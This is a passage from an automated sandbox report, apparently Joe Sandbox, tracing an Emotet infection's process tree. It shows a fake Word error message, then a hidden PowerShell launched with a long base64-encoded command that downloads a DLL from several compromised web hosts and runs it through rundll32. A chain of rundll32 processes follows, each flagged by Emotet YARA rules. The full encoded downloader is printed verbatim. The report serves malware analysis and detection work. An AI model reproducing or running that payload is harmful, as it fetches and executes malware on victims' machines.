ACkA
                                            Imagebase:0x4a190000
                                            File size:345088 bytes
                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Analysis Process: msg.exe PID: 2420 Parent PID: 2632

                                            General

                                            Start time:08:57:42
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\msg.exe
                                            Wow64 process (32bit):false
                                            Commandline:msg user /v Word experienced an error trying to open the file.
                                            Imagebase:0xff400000
                                            File size:26112 bytes
                                            MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Analysis Process: powershell.exe PID: 2356 Parent PID: 2632

                                            General

                                            Start time:08:57:42
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA
                                            Imagebase:0x13fb80000
                                            File size:473600 bytes
                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2096562119.0000000000296000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2096633057.0000000001B66000.00000004.00000001.sdmp, Author: Florian Roth
                                            Reputation:high

                                            Analysis Process: rundll32.exe PID: 2892 Parent PID: 2356

                                            General

                                            Start time:08:57:45
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\rundll32.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                                            Imagebase:0xffb30000
                                            File size:45568 bytes
                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2912 Parent PID: 2892

                                            General

                                            Start time:08:57:45
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2099273377.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2099440995.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 1748 Parent PID: 2912

                                            General

                                            Start time:08:57:46
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cgjbbwbf\qqtudgd.huj',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2100654563.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2100698593.0000000000251000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2944 Parent PID: 1748

                                            General

                                            Start time:08:57:46
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nkqiqdbodnub\wtlcjwyiszo.kcs',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2101721678.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2101746597.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2484 Parent PID: 2944

                                            General

                                            Start time:08:57:47
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zersybwlygjod\ujnaefcctevs.wag',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2103683744.00000000001E1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2103560548.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2388 Parent PID: 2484

                                            General

                                            Start time:08:57:48
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gocmtvldv\plpbjoam.bfk',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2105305860.00000000001E1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2105231881.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2844 Parent PID: 2388

                                            General

                                            Start time:08:57:48
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uyxqa\ucgv.gdq',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2106388395.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2106314094.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 3036 Parent PID: 2844

                                            General

                                            Start time:08:57:49
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nxixsue\ekwnwx.zgx',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2107874642.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2108018320.00000000001E1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2284 Parent PID: 3036

                                            General

                                            Start time:08:57:50
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgjjq\jcse.fro',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2109151387.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2109044611.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 1776 Parent PID: 2284

                                            General

                                            Start time:08:57:50
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kggdchrkalohz\pkgboheoanvf.hox',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2110616410.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2110668347.0000000000281000.00000020.00000001.sdmp, Author: Joe Security

                                            Analysis Process: rundll32.exe PID: 1664 Parent PID: 1776

                                            General

                                            Start time:08:57:51
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jhnbwsyvosmob\uzkhbqpbyyqm.xoq',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2112015647.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2112073559.0000000000221000.00000020.00000001.sdmp, Author: Joe Security

                                            Analysis Process: rundll32.exe PID: 2452 Parent PID: 1664

                                            General

                                            Start time:08:57:52
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ulduktzjxplnmpb\xnnmpmxkpltkbl.ghw',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2113027910.0000000000231000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2112967165.0000000000210000.00000040.00000001.sdmp, Author: Joe Security

                                            Analysis Process: rundll32.exe PID: 2616 Parent PID: 2452

                                            General

                                            Start time:08:57:52
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohslgtw\xeprri.cyh',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2114668618.00000000006E0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2114707003.0000000000701000.00000020.00000001.sdmp, Author: Joe Security

                                            Analysis Process: rundll32.exe PID: 2644 Parent PID: 2616

                                            General

                                            Start time:08:57:53
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Adumhgbkvoz\tdxrpdrtbm.quu',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2116945153.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2117172638.0000000000301000.00000020.00000001.sdmp, Author: Joe Security

                                            Analysis Process: rundll32.exe PID: 2904 Parent PID: 2644

                                            General

                                            Start time:08:57:53
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fnniqydokod\xeqkvdqlhe.bce',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2119170548.0000000000291000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2119062368.0000000000270000.00000040.00000001.sdmp, Author: Joe Security

                                            Analysis Process: rundll32.exe PID: 944 Parent PID: 2904

                                            General

                                            Start time:08:57:54
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wpjypezem\yvgznbmd.qnx',Control_RunDLL
                                            Imagebase:0x820000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2351272233.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2351339088.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security

                                            Disassembly

                                            Code Analysis

                                            Reset < >